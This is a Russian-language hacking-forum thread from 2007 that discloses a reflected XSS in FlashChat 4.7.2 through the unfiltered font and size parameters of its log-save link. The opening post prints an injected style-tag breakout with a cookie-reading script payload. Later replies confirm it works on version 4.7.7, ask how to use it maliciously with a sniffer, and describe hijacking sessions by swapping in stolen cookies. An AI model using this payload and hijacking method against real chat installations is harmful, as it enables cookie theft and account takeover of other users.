FlashChat v 4.7.2

Discussion in 'Песочница' started by Goudini, 2 Feb 2007.

  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    Пришлось мне потеститьFlashChat v 4.7.2
    Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

    В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

    По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс

    Code:
    	
<style type="text/css">
<!--
BODY {
	font-family: [B][COLOR=White]Arial[/COLOR][/B], Verdana, Arial, Helvetica, sans-serif;
	font-size: [B][COLOR=White]13[/COLOR][/B]px;
}
-->
</style>
    Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
    Вот xss:

    Теперь иходный код примет такой вид

    Code:
    	
<style type="text/css">
<!--
BODY {
	font-family: Arial, Verdana, Arial, Helvetica, sans-serif;
	font-size: 13px;}--></style>[B][COLOR=White]<script>alert(document.cookie)</script>[/COLOR][/B]<!--
}
-->
</style>
    А вот и куки =)
    html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте
     
    #1 Goudini, 2 Feb 2007
    9 people like this.
  2. Connor

    Connor Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    295
    Likes Received:
    287
    Reputations:
    38
    Как можно прикрыть ету уязвимость?И существует ли она в других версиях чата?
     
    #2 Connor, 2 Feb 2007
  3. track

    track New Member

    Joined:
    20 Jun 2006
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    попробовал на версии 4.7.7
    походу тож работает :D
     
    #3 track, 5 Feb 2007
  4. jusuf

    jusuf New Member

    Joined:
    16 Jun 2006
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    a kak panimat vot eta ?
    Code:
    357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|utmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684.1171122060.2; __utmc=125134932; __utmb=125134932
    no chat nawerna ciutka perepisan
     
    #4 jusuf, 10 Feb 2007
  5. Dimon_Aka_Sexxx

    Dimon_Aka_Sexxx New Member

    Joined:
    21 Jan 2007
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    +1
    Ну и начерта нам наши же кукисы?)
    Как это можно юзать в злостных целях ?
     
    #5 Dimon_Aka_Sexxx, 12 Feb 2007
    Last edited: 12 Feb 2007
    1 person likes this.
  6. Linuxoid

    Linuxoid Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    200
    Likes Received:
    28
    Reputations:
    0
    Жжош! Некогда не юзал чтоли подобные уязвимости?
    Кури ЭТО. ;)
     
    #6 Linuxoid, 2 Mar 2007
  7. Витян

    Витян Elder - Старейшина

    Joined:
    25 Dec 2006
    Messages:
    190
    Likes Received:
    83
    Reputations:
    14
    я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.
     
    #7 Витян, 2 Mar 2007
    1 person likes this.
  8. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Тебе же дали этот линк
    дык читай... =\
     
    #8 ice1k, 2 Mar 2007
    1 person likes this.
  9. Apik

    Apik New Member

    Joined:
    4 Apr 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.
     
    #9 Apik, 8 Apr 2007
  10. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    По моему нет принципиальных отличий от других XSS, зачем писать видео?
    Посмотри про использование пассивных XSS в других движках - меняется только ссылка с javascript'ом, если для тебя главное - посмотреть, как использовать сниффер - нет разницы.
     
    #10 Horsekiller, 9 Apr 2007
  11. Apik

    Apik New Member

    Joined:
    4 Apr 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Затем что я не работал никогда с Xss, и поэтому, хоть особых отличий нету, но все таки они будут, хоть малейшие. И чтобы не сидеть и не думать, что сделал не так, хотелось бы посмотреть видео, все доступно.
     
    #11 Apik, 10 Apr 2007
  12. NiGHt-LEshiY

    NiGHt-LEshiY Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    .
     
    #12 NiGHt-LEshiY, 8 Jul 2007
    Last edited: 27 Sep 2015
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    NiGHt-LEshiY
    меняй у себя в бразуере свои куки на те , что получил
     
    #13 Spyder, 10 Jul 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.